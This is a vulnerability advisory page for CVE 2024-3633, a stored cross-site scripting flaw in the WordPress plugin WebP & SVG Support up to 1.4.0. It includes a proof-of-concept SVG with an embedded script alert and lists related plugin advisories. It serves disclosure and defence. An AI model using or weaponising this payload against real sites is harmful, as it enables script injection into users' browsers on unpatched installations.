WebP & SVG Support <= 1.4.0 – Author+ Stored XSS via SVG | CVE 2024-3633 | Plugin Vulnerabilities

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

Upload an SVG with the following markup:

```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS");
  </script>
</svg>
```

Load the SVG and see the XSS.

Code reference:
https://plugins.trac.wordpress.org/browser/webp-svg-support/trunk/core/bootstrap.php#L111

Affects Plugins

webp-svg-support

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas, Rayhan Ramdhany Hanaputra

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

2e0baffb-7ab8-4c17-aa2a-7f28a0be1a41

Timeline

Publicly Published

2024-06-05 (about 25 days ago)

Added

2024-06-05 (about 24 days ago)

Last Updated

2024-06-05 (about 24 days ago)

Other

Published

Title

Published

2021-05-26

Title

Visitors <= 0.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2023-03-29

Title

Wp Ultimate Review < 2.1.0 - Admin+ Stored XSS

Published

2021-07-19

Title

Telugu Bible Verse Daily <= 1.0 - CSRF to Stored XSS

Published

2024-04-25

Title

VOD Infomaniak <= 1.5.6 - Reflected Cross-Site Scripting

Published

2023-03-20

Title

FluentForms < 4.3.25 - Contributor+ Stored XSS via Custom HTML Form Field